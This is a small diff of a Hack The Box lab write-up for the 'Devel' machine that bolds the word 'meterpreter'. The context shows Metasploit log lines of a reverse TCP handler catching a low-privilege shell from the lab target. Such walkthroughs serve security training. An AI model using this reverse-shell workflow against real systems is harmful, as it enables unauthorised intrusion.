b4cksp4c3/b4cksp4c3.github.io/htb/writeups/devel.md

 <center><img src="/htb/devel/shell.png"></center>
 <br>
-Now if we check the listener we should have a meterpreter shell.
+Now if we check the listener we should have a <b>meterpreter</b> shell.
 Checking the user we will see that we have a low privilege shell
 ```
 [*] Started reverse TCP handler on 10.10.14.21:4444
 [*] Sending stage (179779 bytes) to 10.10.10.5